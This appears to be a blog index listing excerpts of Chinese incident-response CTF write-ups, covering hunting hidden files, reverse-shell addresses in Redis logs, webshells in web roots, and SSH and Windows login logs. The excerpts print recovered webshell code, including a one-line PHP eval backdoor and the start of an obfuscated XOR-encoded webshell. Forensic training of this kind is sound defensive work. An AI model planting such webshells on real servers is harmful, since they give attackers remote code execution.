1.5k 1 分钟

# 题目 1 黑客隐藏的隐藏的文件 完整路径 md5 root@xuanji:~# echo -n "/tmp/.temp/libprocesshider/1.py" | md5sum109ccb5768c70638e24fb46ee7957e37 -flag: flag{109ccb5768c70638e24fb46ee7957e37} # 题目 2 黑客隐藏的文件反弹 shell 的 ip + 端口 {ip:port} root@xuanji:~# cat /tmp/.temp/libprocesshider/1.py | grep...
3.9k 4 分钟

# 题目 1 root@ip-10-0-10-3:~# cat /var/log/redis.log* | grep "Connecting" | cut -d" " -f10 | sort | uniq -c 48 192.168.100.13:8888 2 192.168.100.20:8888 1 192.168.31.55:8888root@ip-10-0-10-3:~# cat /var/log/redis.log|grep -w '192.168.100.20:8888' -C 3419:S 31 Jul 2023...
3.1k 3 分钟

# 题目 1 1. 黑客第一次写入的 shell flag {关键字符串} root@xuanji:/var/www/html# ls -lttotal 508-rw-r--r--. 1 www-data www-data 483403 Aug 1 2023 adminer.php-rw-rw-rw-. 1 mysql mysql 73 Aug 1 2023 sh.php-rw-rw-rw-. 1 mysql mysql 0 Aug 1 2023 tmpubzil.php-rw-rw-rw-. 1 mysql mysql 0 Aug 1 2023 tmputsrv.php-rw-rw-rw-....
1.7k 2 分钟

# 题目 1 web 目录存在木马,请找到木马的密码提交 html 打包下载,火绒直接查杀了三个 shell 文件出来。 root@ip-10-0-10-1:/var/www/html# cat 1.php <?php eval($_POST[1]);?>flag: flag{1} # 题目 2 服务器疑似存在不死马,请找到不死马的密码提交 root@ip-10-0-10-1:/var/www/html# cat .shell.php <?php...
2.3k 2 分钟

# 题目 1 1. 将黑客成功登录系统所使用的 IP 地址作为 Flag 值提交; windows 下使用 logpraser 查阅日志: D:\Desktop\Defense-Tool\Windows>LogParser -i:EVT "SELECT EXTRACT_TOKEN(Strings, 18, '|') FROM 安全.evtx WHERE NOT EXTRACT_TOKEN(Strings, 18, '|')='-' AND EventID = 4624"...
603 1 分钟

# 题目 1 通过本地 PC RDP 到服务器并且找到黑客植入 shell, 将黑客植入 shell 的密码 作为 FLAG 提交; 打开 phpstudy,查看网站根目录 网站根目录: C:\phpstudy_pro\WWW\WWW 老样子,下载下来直接拦截 哈希解密: rebeyond flag: flag{rebeyond} # 题目 2 通过本地 PC RDP 到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交; 打开日志目录:...
1.8k 2 分钟

# 题目 1 黑客 webshell 里面的 flag flag {xxxxx-xxxx-xxxx-xxxx-xxxx} 下载下来直接被拦了,发现木马。 <?php@session_start();@set_time_limit(0);@error_reporting(0);function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return...
7.1k 6 分钟

任务环境说明 注:进去后执行 sed -i's/Listen 80/Listen 9999/' /etc/apache2/ports.conf && service apache2 restart # 题目 1 攻击者通过什么密码成功登录了网站的后台?提交密码字符串的小写 md5 值,格式 flag {md5}。 根目录下有一个 wireshark.pcap 的流量包 wireshark 打开,先过滤 http 请求,然后追踪 http 流,通过关键字 &password 搜索,找到返回为 302 跳转的请求。 密码:...
663 1 分钟

# 题目 1 提交当天访问次数最多的 IP,即黑客 IP: cat /var/log/apache2/access.log* | grep "03/Aug/2023" | cut -d " " -f1 | sort | uniq -cflag: flag{192.168.200.2} # 题目 2 黑客使用的浏览器指纹是什么,提交指纹的 md5: cat /var/log/apache2/access.log* | grep "192.168.200.2" | cut...
1.6k 1 分钟

# 题目 1 1. 有多少 IP 在爆破主机 ssh 的 root 帐号,如果有多个使用 "," 分割 小到大排序 例如 flag {192.168.200.1,192.168.200.2} echo "flag{"$(cat /var/log/auth.log* | grep -a "Failed password for root" | cut -d " " -f 12 | uniq | sort | tr '\n' ','| sed...